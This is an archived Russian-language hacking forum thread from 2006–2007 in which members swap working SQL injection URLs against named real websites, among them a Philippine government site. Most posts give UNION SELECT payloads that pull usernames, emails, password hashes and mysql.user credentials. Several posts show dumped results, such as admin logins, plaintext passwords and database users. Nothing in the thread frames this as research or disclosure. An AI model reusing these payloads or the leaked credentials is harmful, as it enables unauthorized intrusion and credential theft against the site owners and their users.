SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    +1 - 5 версия.
    Вывод данных:

    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/*
    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/*
    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*
     
    2 people like this.
  2. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Сорри, затупил. С кем не бывает? :)
     
  3. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193
    хеши mysql-5, версия 4.1* =)
     
  4. lol2006

    lol2006 Elder - Старейшина

    Joined:
    25 May 2006
    Messages:
    75
    Likes Received:
    16
    Reputations:
    0
    Вот
    Code:
    http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
    Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
     
  5. dadunnnt

    dadunnnt New Member

    Joined:
    16 Feb 2006
    Messages:
    21
    Likes Received:
    4
    Reputations:
    3

    USER() : rossorig_superus@localhost
    VERSION() : 4.0.27-log
    DATABASE() : rossorig_agbook1
     
    2 people like this.
  6. Gorn

    Gorn Member

    Joined:
    25 Oct 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    2
    Вот, погуглил немного:
    Code:
    http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users
    http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
    http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
    http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6
    Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\
    Code:
    http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua
    user: admin
    pass: repz
    
    Если что-то уже было - ссори за боян :)
     
    #2206 Gorn, 16 May 2007
    Last edited: 16 May 2007
    1 person likes this.
  7. sob@ke

    sob@ke Banned

    Joined:
    30 Dec 2006
    Messages:
    35
    Likes Received:
    9
    Reputations:
    -1
    http://www.dancenter.ru/articals.php?id=30'
     
    #2207 sob@ke, 16 May 2007
    Last edited: 16 May 2007
  8. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    www.razvod.ru (4)
    phpbb_users (username, user_password, etc.)
    ps sob@ke
    уже было
     
  9. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    Code:
    http://www.minton.com.tr/html/urun.asp?urun=456465+union+select
    есть такая фирма у турок: Minton называется гы. Не смог тейбл подобрать :(
     
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/*
    -------------

    Code:
    http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    -------------

    Code:
    http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/*
    http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*
    -------------

    Code:
    http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/*
    -------------

    Code:
    http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/*
    Интересных таблиц не нашел:

    Code:
    http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*
     
  11. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/*
    
    P.S. заюзал антибоян только щас... скуля-боян. :mad:
     
    #2211 -=lebed=-, 16 May 2007
    Last edited: 17 May 2007
    1 person likes this.
  12. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    Department of Social Welfare and Development
    DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines
    Code:
    http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*
    
     
  13. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    antigreen.ru
     
    1 person likes this.
  14. jmp_$-3

    jmp_$-3 New Member

    Joined:
    27 Mar 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ХЭttp://tik.ru/pages/search.php?search=%27

    Code:
    TABLE_NAME:
    tik_pages
    tik_users
    Code:
    TABLE_STRUCT (tik_users):
    1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
    Интересная игрушка :)
    Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.
     
  15. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Коррозия Металла

    http://www.korroziametalla.com/
    уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
    -> mysql 5
    смотрим таблицы стандартными средствами пятой версии:
    находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде
    админка
     
    #2215 Серенький, 16 May 2007
    Last edited: 16 May 2007
    4 people like this.
  16. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2

    root@localhost:299ce3c1618fe6e4

    pass:zaq12345
     
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/*
    Code:
    http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*
     
  18. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Админку найти несмог(, хеши это md5 урезаные до 30 символов, у первых 6 человек один и тот же пароль 123(ещё бы знать его куда воткнуть :) ), дальше несмотрел
     
    1 person likes this.
  19. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    *BRAVO* :D

    красиво :)

    p.s. дальше не копал. пользователей там много :) mysql.user закрыт.
     
    #2219 p-range, 17 May 2007
    Last edited: 17 May 2007
    1 person likes this.
  20. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    http://doska.911.by
    Code:
    http://doska.911.by/full_info.php?sid=-1+union+select+1/*
     
    1 person likes this.
Thread Status:
Not open for further replies.